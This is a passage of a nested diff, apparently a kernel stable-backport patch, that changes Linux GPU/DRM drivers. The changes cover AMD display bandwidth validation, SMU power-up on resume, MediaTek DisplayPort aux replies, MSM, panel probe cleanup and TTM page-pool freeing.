++	    (fast_validate || vlevel == context->bw_ctx.dml.soc.num_states ||
++			vba->DRAMClockChangeSupport[vlevel][vba->maxMpcComb] == dm_dram_clock_change_unsupported)) {
+ 		/*
+-		 * If mode is unsupported or there's still no p-state support then
+-		 * fall back to favoring voltage.
++		 * If mode is unsupported or there's still no p-state support
++		 * then fall back to favoring voltage.
+ 		 *
+ 		 * We don't actually support prefetch mode 2, so require that we
+ 		 * at least support prefetch mode 1.
+@@ -2063,7 +2065,7 @@ bool dcn30_validate_bandwidth(struct dc *dc,
+ 	BW_VAL_TRACE_COUNT();
+ 
+ 	DC_FP_START();
+-	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate);
++	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate, true);
+ 	DC_FP_END();
+ 
+ 	if (pipe_cnt == 0)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.h b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.h
+index 7d063c7d6a4bf..8e6b8b7368fdb 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.h
+@@ -64,7 +64,8 @@ bool dcn30_internal_validate_bw(
+ 		display_e2e_pipe_params_st *pipes,
+ 		int *pipe_cnt_out,
+ 		int *vlevel_out,
+-		bool fast_validate);
++		bool fast_validate,
++		bool allow_self_refresh_only);
+ void dcn30_calculate_wm_and_dlg(
+ 		struct dc *dc, struct dc_state *context,
+ 		display_e2e_pipe_params_st *pipes,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
+index 3ca517dcc82dc..d3918a10773a3 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
+@@ -1795,7 +1795,7 @@ bool dcn31_validate_bandwidth(struct dc *dc,
+ 	BW_VAL_TRACE_COUNT();
+ 
+ 	DC_FP_START();
+-	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate);
++	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate, true);
+ 	DC_FP_END();
+ 
+ 	// Disable fast_validate to set min dcfclk in alculate_wm_and_dlg
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index 73f519dbdb531..9ffba4c6fe550 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -1697,6 +1697,81 @@ static void dcn314_get_panel_config_defaults(struct dc_panel_config *panel_confi
+ 	*panel_config = panel_config_defaults;
+ }
+ 
++static bool filter_modes_for_single_channel_workaround(struct dc *dc,
++		struct dc_state *context)
++{
++	// Filter 2K@240Hz+8K@24fps above combination timing if memory only has single dimm LPDDR
++	if (dc->clk_mgr->bw_params->vram_type == 34 && dc->clk_mgr->bw_params->num_channels < 2) {
++		int total_phy_pix_clk = 0;
++
++		for (int i = 0; i < context->stream_count; i++)
++			if (context->res_ctx.pipe_ctx[i].stream)
++				total_phy_pix_clk += context->res_ctx.pipe_ctx[i].stream->phy_pix_clk;
++
++		if (total_phy_pix_clk >= (1148928+826260)) //2K@240Hz+8K@24fps
++			return true;
++	}
++	return false;
++}
++
++bool dcn314_validate_bandwidth(struct dc *dc,
++		struct dc_state *context,
++		bool fast_validate)
++{
++	bool out = false;
++
++	BW_VAL_TRACE_SETUP();
++
++	int vlevel = 0;
++	int pipe_cnt = 0;
++	display_e2e_pipe_params_st *pipes = kzalloc(dc->res_pool->pipe_count * sizeof(display_e2e_pipe_params_st), GFP_KERNEL);
++	DC_LOGGER_INIT(dc->ctx->logger);
++
++	BW_VAL_TRACE_COUNT();
++
++	if (filter_modes_for_single_channel_workaround(dc, context))
++		goto validate_fail;
++
++	DC_FP_START();
++	// do not support self refresh only
++	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate, false);
++	DC_FP_END();
++
++	// Disable fast_validate to set min dcfclk in calculate_wm_and_dlg
++	if (pipe_cnt == 0)
++		fast_validate = false;
++
++	if (!out)
++		goto validate_fail;
++
++	BW_VAL_TRACE_END_VOLTAGE_LEVEL();
++
++	if (fast_validate) {
++		BW_VAL_TRACE_SKIP(fast);
++		goto validate_out;
++	}
++
++	dc->res_pool->funcs->calculate_wm_and_dlg(dc, context, pipes, pipe_cnt, vlevel);
++
++	BW_VAL_TRACE_END_WATERMARKS();
++
++	goto validate_out;
++
++validate_fail:
++	DC_LOG_WARNING("Mode Validation Warning: %s failed validation.\n",
++		dml_get_status_message(context->bw_ctx.dml.vba.ValidationStatus[context->bw_ctx.dml.vba.soc.num_states]));
++
++	BW_VAL_TRACE_SKIP(fail);
++	out = false;
++
++validate_out:
++	kfree(pipes);
++
++	BW_VAL_TRACE_FINISH();
++
++	return out;
++}
++
+ static struct resource_funcs dcn314_res_pool_funcs = {
+ 	.destroy = dcn314_destroy_resource_pool,
+ 	.link_enc_create = dcn31_link_encoder_create,
+@@ -1704,7 +1779,7 @@ static struct resource_funcs dcn314_res_pool_funcs = {
+ 	.link_encs_assign = link_enc_cfg_link_encs_assign,
+ 	.link_enc_unassign = link_enc_cfg_link_enc_unassign,
+ 	.panel_cntl_create = dcn31_panel_cntl_create,
+-	.validate_bandwidth = dcn31_validate_bandwidth,
++	.validate_bandwidth = dcn314_validate_bandwidth,
+ 	.calculate_wm_and_dlg = dcn31_calculate_wm_and_dlg,
+ 	.update_soc_for_wm_a = dcn31_update_soc_for_wm_a,
+ 	.populate_dml_pipes = dcn314_populate_dml_pipes_from_context,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.h b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.h
+index 0dd3153aa5c17..49ffe71018dfb 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.h
+@@ -39,6 +39,10 @@ struct dcn314_resource_pool {
+ 	struct resource_pool base;
+ };
+ 
++bool dcn314_validate_bandwidth(struct dc *dc,
++		struct dc_state *context,
++		bool fast_validate);
++
+ struct resource_pool *dcn314_create_resource_pool(
+ 		const struct dc_init_data *init_data,
+ 		struct dc *dc);
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
+index d4c0f9cdac8e2..4fa6363647937 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
+@@ -634,7 +634,7 @@ int dcn30_find_dummy_latency_index_for_fw_based_mclk_switch(struct dc *dc,
+ 	while (dummy_latency_index < max_latency_table_entries) {
+ 		context->bw_ctx.dml.soc.dram_clock_change_latency_us =
+ 				dc->clk_mgr->bw_params->dummy_pstate_table[dummy_latency_index].dummy_pstate_latency_us;
+-		dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, false);
++		dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, false, true);
+ 
+ 		if (context->bw_ctx.dml.soc.allow_dram_self_refresh_or_dram_clock_change_in_vblank ==
+ 			dm_allow_self_refresh_and_mclk_switch)
+diff --git a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+index 9b5d9b2c9a6a7..e75b443ee95dc 100644
+--- a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
++++ b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+@@ -916,3 +916,38 @@ bool mod_power_only_edp(const struct dc_state *context, const struct dc_stream_s
+ {
+ 	return context && context->stream_count == 1 && dc_is_embedded_signal(stream->signal);
+ }
++
++bool psr_su_set_y_granularity(struct dc *dc, struct dc_link *link,
++			      struct dc_stream_state *stream,
++			      struct psr_config *config)
++{
++	uint16_t pic_height;
++	uint8_t slice_height;
++
++	if ((link->connector_signal & SIGNAL_TYPE_EDP) &&
++	    (!dc->caps.edp_dsc_support ||
++	    link->panel_config.dsc.disable_dsc_edp ||
++	    !link->dpcd_caps.dsc_caps.dsc_basic_caps.fields.dsc_support.DSC_SUPPORT ||
++	    !stream->timing.dsc_cfg.num_slices_v))
++		return true;
++
++	pic_height = stream->timing.v_addressable +
++		stream->timing.v_border_top + stream->timing.v_border_bottom;
++
++	if (stream->timing.dsc_cfg.num_slices_v == 0)
++		return false;
++
++	slice_height = pic_height / stream->timing.dsc_cfg.num_slices_v;
++
++	if (slice_height) {
++		if (config->su_y_granularity &&
++		    (slice_height % config->su_y_granularity)) {
++			ASSERT(0);
++			return false;
++		}
++
++		config->su_y_granularity = slice_height;
++	}
++
++	return true;
++}
+diff --git a/drivers/gpu/drm/amd/display/modules/power/power_helpers.h b/drivers/gpu/drm/amd/display/modules/power/power_helpers.h
+index 316452e9dbc91..bb16b37b83da7 100644
+--- a/drivers/gpu/drm/amd/display/modules/power/power_helpers.h
++++ b/drivers/gpu/drm/amd/display/modules/power/power_helpers.h
+@@ -59,4 +59,7 @@ void mod_power_calc_psr_configs(struct psr_config *psr_config,
+ 		const struct dc_stream_state *stream);
+ bool mod_power_only_edp(const struct dc_state *context,
+ 		const struct dc_stream_state *stream);
++bool psr_su_set_y_granularity(struct dc *dc, struct dc_link *link,
++			      struct dc_stream_state *stream,
++			      struct psr_config *config);
+ #endif /* MODULES_POWER_POWER_HELPERS_H_ */
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index 6ab1550235926..516e07c367f00 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -161,10 +161,15 @@ int smu_get_dpm_freq_range(struct smu_context *smu,
+ 
+ int smu_set_gfx_power_up_by_imu(struct smu_context *smu)
+ {
+-	if (!smu->ppt_funcs || !smu->ppt_funcs->set_gfx_power_up_by_imu)
+-		return -EOPNOTSUPP;
++	int ret = 0;
++	struct amdgpu_device *adev = smu->adev;
+ 
+-	return smu->ppt_funcs->set_gfx_power_up_by_imu(smu);
++	if (smu->ppt_funcs->set_gfx_power_up_by_imu) {
++		ret = smu->ppt_funcs->set_gfx_power_up_by_imu(smu);
++		if (ret)
++			dev_err(adev->dev, "Failed to enable gfx imu!\n");
++	}
++	return ret;
+ }
+ 
+ static u32 smu_get_mclk(void *handle, bool low)
+@@ -195,6 +200,19 @@ static u32 smu_get_sclk(void *handle, bool low)
+ 	return clk_freq * 100;
+ }
+ 
++static int smu_set_gfx_imu_enable(struct smu_context *smu)
++{
++	struct amdgpu_device *adev = smu->adev;
++
++	if (adev->firmware.load_type != AMDGPU_FW_LOAD_PSP)
++		return 0;
++
++	if (amdgpu_in_reset(smu->adev) || adev->in_s0ix)
++		return 0;
++
++	return smu_set_gfx_power_up_by_imu(smu);
++}
++
+ static int smu_dpm_set_vcn_enable(struct smu_context *smu,
+ 				  bool enable)
+ {
+@@ -1386,15 +1404,9 @@ static int smu_hw_init(void *handle)
+ 	}
+ 
+ 	if (smu->is_apu) {
+-		if ((smu->ppt_funcs->set_gfx_power_up_by_imu) &&
+-				likely(adev->firmware.load_type == AMDGPU_FW_LOAD_PSP)) {
+-			ret = smu->ppt_funcs->set_gfx_power_up_by_imu(smu);
+-			if (ret) {
+-				dev_err(adev->dev, "Failed to Enable gfx imu!\n");
+-				return ret;
+-			}
+-		}
+-
++		ret = smu_set_gfx_imu_enable(smu);
++		if (ret)
++			return ret;
+ 		smu_dpm_set_vcn_enable(smu, true);
+ 		smu_dpm_set_jpeg_enable(smu, true);
+ 		smu_set_gfx_cgpg(smu, true);
+@@ -1671,6 +1683,10 @@ static int smu_resume(void *handle)
+ 		return ret;
+ 	}
+ 
++	ret = smu_set_gfx_imu_enable(smu);
++	if (ret)
++		return ret;
++
+ 	smu_set_gfx_cgpg(smu, true);
+ 
+ 	smu->disable_uclk_switch = 0;
+diff --git a/drivers/gpu/drm/bridge/adv7511/adv7533.c b/drivers/gpu/drm/bridge/adv7511/adv7533.c
+index fdfeadcefe805..7e3e56441aedc 100644
+--- a/drivers/gpu/drm/bridge/adv7511/adv7533.c
++++ b/drivers/gpu/drm/bridge/adv7511/adv7533.c
+@@ -103,22 +103,19 @@ void adv7533_dsi_power_off(struct adv7511 *adv)
+ enum drm_mode_status adv7533_mode_valid(struct adv7511 *adv,
+ 					const struct drm_display_mode *mode)
+ {
+-	int lanes;
++	unsigned long max_lane_freq;
+ 	struct mipi_dsi_device *dsi = adv->dsi;
++	u8 bpp = mipi_dsi_pixel_format_to_bpp(dsi->format);
+ 
+-	if (mode->clock > 80000)
+-		lanes = 4;
+-	else
+-		lanes = 3;
+-
+-	/*
+-	 * TODO: add support for dynamic switching of lanes
+-	 * by using the bridge pre_enable() op . Till then filter
+-	 * out the modes which shall need different number of lanes
+-	 * than what was configured in the device tree.
+-	 */
+-	if (lanes != dsi->lanes)
+-		return MODE_BAD;
++	/* Check max clock for either 7533 or 7535 */
++	if (mode->clock > (adv->type == ADV7533 ? 80000 : 148500))
++		return MODE_CLOCK_HIGH;
++
++	/* Check max clock for each lane */
++	max_lane_freq = (adv->type == ADV7533 ? 800000 : 891000);
++
++	if (mode->clock * bpp > max_lane_freq * adv->num_dsi_lanes)
++		return MODE_CLOCK_HIGH;
+ 
+ 	return MODE_OK;
+ }
+diff --git a/drivers/gpu/drm/drm_probe_helper.c b/drivers/gpu/drm/drm_probe_helper.c
+index bcd9611dabfd9..1a672747c83b8 100644
+--- a/drivers/gpu/drm/drm_probe_helper.c
++++ b/drivers/gpu/drm/drm_probe_helper.c
+@@ -556,8 +556,9 @@ retry:
+ 		 */
+ 		dev->mode_config.delayed_event = true;
+ 		if (dev->mode_config.poll_enabled)
+-			schedule_delayed_work(&dev->mode_config.output_poll_work,
+-					      0);
++			mod_delayed_work(system_wq,
++					 &dev->mode_config.output_poll_work,
++					 0);
+ 	}
+ 
+ 	/* Re-enable polling in case the global poll config changed. */
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index 2d46dcf820a23..80eb4f92167cc 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -1090,7 +1090,7 @@ intel_get_crtc_new_encoder(const struct intel_atomic_state *state,
+ 		num_encoders++;
+ 	}
+ 
+-	drm_WARN(encoder->base.dev, num_encoders != 1,
++	drm_WARN(state->base.dev, num_encoders != 1,
+ 		 "%d encoders for pipe %c\n",
+ 		 num_encoders, pipe_name(master_crtc->pipe));
+ 
+diff --git a/drivers/gpu/drm/lima/lima_drv.c b/drivers/gpu/drm/lima/lima_drv.c
+index 7b8d7178d09aa..39cab4a55f572 100644
+--- a/drivers/gpu/drm/lima/lima_drv.c
++++ b/drivers/gpu/drm/lima/lima_drv.c
+@@ -392,8 +392,10 @@ static int lima_pdev_probe(struct platform_device *pdev)
+ 
+ 	/* Allocate and initialize the DRM device. */
+ 	ddev = drm_dev_alloc(&lima_drm_driver, &pdev->dev);
+-	if (IS_ERR(ddev))
+-		return PTR_ERR(ddev);
++	if (IS_ERR(ddev)) {
++		err = PTR_ERR(ddev);
++		goto err_out0;
++	}
+ 
+ 	ddev->dev_private = ldev;
+ 	ldev->ddev = ddev;
+diff --git a/drivers/gpu/drm/mediatek/mtk_dp.c b/drivers/gpu/drm/mediatek/mtk_dp.c
+index 9d085c05c49c3..007af69e5026f 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dp.c
++++ b/drivers/gpu/drm/mediatek/mtk_dp.c
+@@ -806,10 +806,9 @@ static int mtk_dp_aux_wait_for_completion(struct mtk_dp *mtk_dp, bool is_read)
+ }
+ 
+ static int mtk_dp_aux_do_transfer(struct mtk_dp *mtk_dp, bool is_read, u8 cmd,
+-				  u32 addr, u8 *buf, size_t length)
++				  u32 addr, u8 *buf, size_t length, u8 *reply_cmd)
+ {
+ 	int ret;
+-	u32 reply_cmd;
+ 
+ 	if (is_read && (length > DP_AUX_MAX_PAYLOAD_BYTES ||
+ 			(cmd == DP_AUX_NATIVE_READ && !length)))
+@@ -841,10 +840,10 @@ static int mtk_dp_aux_do_transfer(struct mtk_dp *mtk_dp, bool is_read, u8 cmd,
+ 	/* Wait for feedback from sink device. */
+ 	ret = mtk_dp_aux_wait_for_completion(mtk_dp, is_read);
+ 
+-	reply_cmd = mtk_dp_read(mtk_dp, MTK_DP_AUX_P0_3624) &
+-		    AUX_RX_REPLY_COMMAND_AUX_TX_P0_MASK;
++	*reply_cmd = mtk_dp_read(mtk_dp, MTK_DP_AUX_P0_3624) &
++		     AUX_RX_REPLY_COMMAND_AUX_TX_P0_MASK;
+ 
+-	if (ret || reply_cmd) {
++	if (ret) {
+ 		u32 phy_status = mtk_dp_read(mtk_dp, MTK_DP_AUX_P0_3628) &
+ 				 AUX_RX_PHY_STATE_AUX_TX_P0_MASK;
+ 		if (phy_status != AUX_RX_PHY_STATE_AUX_TX_P0_RX_IDLE) {
+@@ -1823,7 +1822,8 @@ static irqreturn_t mtk_dp_hpd_event_thread(int hpd, void *dev)
+ 	spin_unlock_irqrestore(&mtk_dp->irq_thread_lock, flags);
+ 
+ 	if (status & MTK_DP_THREAD_CABLE_STATE_CHG) {
+-		drm_helper_hpd_irq_event(mtk_dp->bridge.dev);
++		if (mtk_dp->bridge.dev)
++			drm_helper_hpd_irq_event(mtk_dp->bridge.dev);
+ 
+ 		if (!mtk_dp->train_info.cable_plugged_in) {
+ 			mtk_dp_disable_sdp_aui(mtk_dp);
+@@ -2070,7 +2070,7 @@ static ssize_t mtk_dp_aux_transfer(struct drm_dp_aux *mtk_aux,
+ 		ret = mtk_dp_aux_do_transfer(mtk_dp, is_read, request,
+ 					     msg->address + accessed_bytes,
+ 					     msg->buffer + accessed_bytes,
+-					     to_access);
++					     to_access, &msg->reply);
+ 
+ 		if (ret) {
+ 			drm_info(mtk_dp->drm_dev,
+@@ -2080,7 +2080,6 @@ static ssize_t mtk_dp_aux_transfer(struct drm_dp_aux *mtk_aux,
+ 		accessed_bytes += to_access;
+ 	} while (accessed_bytes < msg->size);
+ 
+-	msg->reply = DP_AUX_NATIVE_REPLY_ACK | DP_AUX_I2C_REPLY_ACK;
+ 	return msg->size;
+ err:
+ 	msg->reply = DP_AUX_NATIVE_REPLY_NACK | DP_AUX_I2C_REPLY_NACK;
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+index 047c5e8c87ff4..f21f1bb7f886d 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+@@ -1743,6 +1743,7 @@ struct msm_gpu *a5xx_gpu_init(struct drm_device *dev)
+ 	struct a5xx_gpu *a5xx_gpu = NULL;
+ 	struct adreno_gpu *adreno_gpu;
+ 	struct msm_gpu *gpu;
++	unsigned int nr_rings;
+ 	int ret;
+ 
+ 	if (!pdev) {
+@@ -1763,7 +1764,12 @@ struct msm_gpu *a5xx_gpu_init(struct drm_device *dev)
+ 
+ 	check_speed_bin(&pdev->dev);
+ 
+-	ret = adreno_gpu_init(dev, pdev, adreno_gpu, &funcs, 4);
++	nr_rings = 4;
++
++	if (adreno_is_a510(adreno_gpu))
++		nr_rings = 1;
++
++	ret = adreno_gpu_init(dev, pdev, adreno_gpu, &funcs, nr_rings);
+ 	if (ret) {
+ 		a5xx_destroy(&(a5xx_gpu->base.base));
+ 		return ERR_PTR(ret);
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_device.c b/drivers/gpu/drm/msm/adreno/adreno_device.c
+index c5c4c93b3689c..cd009d56d35d5 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_device.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_device.c
+@@ -438,9 +438,6 @@ struct msm_gpu *adreno_load_gpu(struct drm_device *dev)
+ 	 */
+ 	pm_runtime_enable(&pdev->dev);
+ 
+-	/* Make sure pm runtime is active and reset any previous errors */
+-	pm_runtime_set_active(&pdev->dev);
+-
+ 	ret = pm_runtime_get_sync(&pdev->dev);
+ 	if (ret < 0) {
+ 		pm_runtime_put_sync(&pdev->dev);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+index 9c6817b5a1943..547f9f2b9fcb5 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+@@ -654,7 +654,7 @@ static int dpu_encoder_virt_atomic_check(
+ 		if (drm_atomic_crtc_needs_modeset(crtc_state)) {
+ 			dpu_rm_release(global_state, drm_enc);
+ 
+-			if (!crtc_state->active_changed || crtc_state->active)
++			if (!crtc_state->active_changed || crtc_state->enable)
+ 				ret = dpu_rm_reserve(&dpu_kms->rm, global_state,
+ 						drm_enc, crtc_state, topology);
+ 		}
+diff --git a/drivers/gpu/drm/panel/panel-novatek-nt35950.c b/drivers/gpu/drm/panel/panel-novatek-nt35950.c
+index 3a844917da075..5d04957b1144f 100644
+--- a/drivers/gpu/drm/panel/panel-novatek-nt35950.c
++++ b/drivers/gpu/drm/panel/panel-novatek-nt35950.c
+@@ -593,8 +593,12 @@ static int nt35950_probe(struct mipi_dsi_device *dsi)
+ 		       DRM_MODE_CONNECTOR_DSI);
+ 
+ 	ret = drm_panel_of_backlight(&nt->panel);
+-	if (ret)
++	if (ret) {
++		if (num_dsis == 2)
++			mipi_dsi_device_unregister(nt->dsi[1]);
++
+ 		return dev_err_probe(dev, ret, "Failed to get backlight\n");
++	}
+ 
+ 	drm_panel_add(&nt->panel);
+ 
+@@ -610,6 +614,10 @@ static int nt35950_probe(struct mipi_dsi_device *dsi)
+ 
+ 		ret = mipi_dsi_attach(nt->dsi[i]);
+ 		if (ret < 0) {
++			/* If we fail to attach to either host, we're done */
++			if (num_dsis == 2)
++				mipi_dsi_device_unregister(nt->dsi[1]);
++
+ 			return dev_err_probe(dev, ret,
+ 					     "Cannot attach to DSI%d host.\n", i);
+ 		}
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_encoder.c b/drivers/gpu/drm/rcar-du/rcar_du_encoder.c
+index b1787be31e92c..7ecec7b04a8d0 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_encoder.c
++++ b/drivers/gpu/drm/rcar-du/rcar_du_encoder.c
+@@ -109,8 +109,8 @@ int rcar_du_encoder_init(struct rcar_du_device *rcdu,
+ 	renc = drmm_encoder_alloc(&rcdu->ddev, struct rcar_du_encoder, base,
+ 				  &rcar_du_encoder_funcs, DRM_MODE_ENCODER_NONE,
+ 				  NULL);
+-	if (!renc)
+-		return -ENOMEM;
++	if (IS_ERR(renc))
++		return PTR_ERR(renc);
+ 
+ 	renc->output = output;
+ 
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_gem.c b/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
+index 6edb7c52cb3dc..19b46c00dcbfd 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
+@@ -262,9 +262,6 @@ static int rockchip_drm_gem_object_mmap(struct drm_gem_object *obj,
+ 	else
+ 		ret = rockchip_drm_gem_object_mmap_dma(obj, vma);
+ 
+-	if (ret)
+-		drm_gem_vm_close(vma);
+-
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/ttm/ttm_pool.c b/drivers/gpu/drm/ttm/ttm_pool.c
+index 9f6764bf3b15d..86affe987a1cb 100644
+--- a/drivers/gpu/drm/ttm/ttm_pool.c
++++ b/drivers/gpu/drm/ttm/ttm_pool.c
+@@ -366,6 +366,43 @@ static int ttm_pool_page_allocated(struct ttm_pool *pool, unsigned int order,
+ 	return 0;
+ }
+ 
++/**
++ * ttm_pool_free_range() - Free a range of TTM pages
++ * @pool: The pool used for allocating.
++ * @tt: The struct ttm_tt holding the page pointers.
++ * @caching: The page caching mode used by the range.
++ * @start_page: index for first page to free.
++ * @end_page: index for last page to free + 1.
++ *
++ * During allocation the ttm_tt page-vector may be populated with ranges of
++ * pages with different attributes if allocation hit an error without being
++ * able to completely fulfill the allocation. This function can be used
++ * to free these individual ranges.
++ */
++static void ttm_pool_free_range(struct ttm_pool *pool, struct ttm_tt *tt,
++				enum ttm_caching caching,
++				pgoff_t start_page, pgoff_t end_page)
++{
++	struct page **pages = tt->pages;
++	unsigned int order;
++	pgoff_t i, nr;
++
++	for (i = start_page; i < end_page; i += nr, pages += nr) {
++		struct ttm_pool_type *pt = NULL;
++
++		order = ttm_pool_page_order(pool, *pages);
++		nr = (1UL << order);
++		if (tt->dma_address)
++			ttm_pool_unmap(pool, tt->dma_address[i], nr);
++
++		pt = ttm_pool_select_type(pool, caching, order);
++		if (pt)
++			ttm_pool_type_give(pt, *pages);
++		else
++			ttm_pool_free_page(pool, caching, order, *pages);
++	}
++}
++
+ /**
+  * ttm_pool_alloc - Fill a ttm_tt object
+  *
+@@ -381,12 +418,14 @@ static int ttm_pool_page_allocated(struct ttm_pool *pool, unsigned int order,
+ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 		   struct ttm_operation_ctx *ctx)
+ {
+-	unsigned long num_pages = tt->num_pages;
++	pgoff_t num_pages = tt->num_pages;
+ 	dma_addr_t *dma_addr = tt->dma_address;
+ 	struct page **caching = tt->pages;
+ 	struct page **pages = tt->pages;
++	enum ttm_caching page_caching;
+ 	gfp_t gfp_flags = GFP_USER;
+-	unsigned int i, order;
++	pgoff_t caching_divide;
++	unsigned int order;
+ 	struct page *p;
+ 	int r;
+ 
+@@ -409,6 +448,7 @@ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 	     order = min_t(unsigned int, order, __fls(num_pages))) {
+ 		struct ttm_pool_type *pt;
+ 
++		page_caching = tt->caching;
+ 		pt = ttm_pool_select_type(pool, tt->caching, order);
+ 		p = pt ? ttm_pool_type_take(pt) : NULL;
+ 		if (p) {
+@@ -417,6 +457,7 @@ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 			if (r)
+ 				goto error_free_page;
+ 
++			caching = pages;
+ 			do {
+ 				r = ttm_pool_page_allocated(pool, order, p,
+ 							    &dma_addr,
+@@ -425,14 +466,15 @@ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 				if (r)
+ 					goto error_free_page;
+ 
++				caching = pages;
+ 				if (num_pages < (1 << order))
+ 					break;
+ 
+ 				p = ttm_pool_type_take(pt);
+ 			} while (p);
+-			caching = pages;
+ 		}
+ 
++		page_caching = ttm_cached;
+ 		while (num_pages >= (1 << order) &&
+ 		       (p = ttm_pool_alloc_page(pool, gfp_flags, order))) {
+ 
+@@ -441,6 +483,7 @@ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 							   tt->caching);
+ 				if (r)
+ 					goto error_free_page;
++				caching = pages;
+ 			}
+ 			r = ttm_pool_page_allocated(pool, order, p, &dma_addr,
+ 						    &num_pages, &pages);
+@@ -467,15 +510,13 @@ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 	return 0;
+ 
+ error_free_page:
+-	ttm_pool_free_page(pool, tt->caching, order, p);
++	ttm_pool_free_page(pool, page_caching, order, p);
+ 
+ error_free_all:
+ 	num_pages = tt->num_pages - num_pages;
+-	for (i = 0; i < num_pages; ) {
+-		order = ttm_pool_page_order(pool, tt->pages[i]);
+-		ttm_pool_free_page(pool, tt->caching, order, tt->pages[i]);
+-		i += 1 << order;
+-	}
++	caching_divide = caching - tt->pages;
++	ttm_pool_free_range(pool, tt, tt->caching, 0, caching_divide);
++	ttm_pool_free_range(pool, tt, ttm_cached, caching_divide, num_pages);
+ 
+ 	return r;
+ }
+@@ -491,27 +532,7 @@ EXPORT_SYMBOL(ttm_pool_alloc);
+  */
+ void ttm_pool_free(struct ttm_pool *pool, struct ttm_tt *tt)
+ {
+-	unsigned int i;
+-
+-	for (i = 0; i < tt->num_pages; ) {
+-		struct page *p = tt->pages[i];
+-		unsigned int order, num_pages;
+-		struct ttm_pool_type *pt;
+-
+-		order = ttm_pool_page_order(pool, p);
+-		num_pages = 1ULL << order;
+-		if (tt->dma_address)
+-			ttm_pool_unmap(pool, tt->dma_address[i], num_pages);
+-
+-		pt = ttm_pool_select_type(pool, tt->caching, order);
+-		if (pt)
+-			ttm_pool_type_give(pt, tt->pages[i]);
+-		else
+-			ttm_pool_free_page(pool, tt->caching, order,
+-					   tt->pages[i]);
+-
+-		i += num_pages;
+-	}
++	ttm_pool_free_range(pool, tt, tt->caching, 0, tt->num_pages);
+ 
+ 	while (atomic_long_read(&allocated_pages) > page_pool_size)
+ 		ttm_pool_shrink();
+diff --git a/drivers/gpu/drm/vgem/vgem_fence.c b/drivers/gpu/drm/vgem/vgem_fence.c
+index c2a879734d407..e157541783959 100644
+--- a/drivers/gpu/drm/vgem/vgem_fence.c
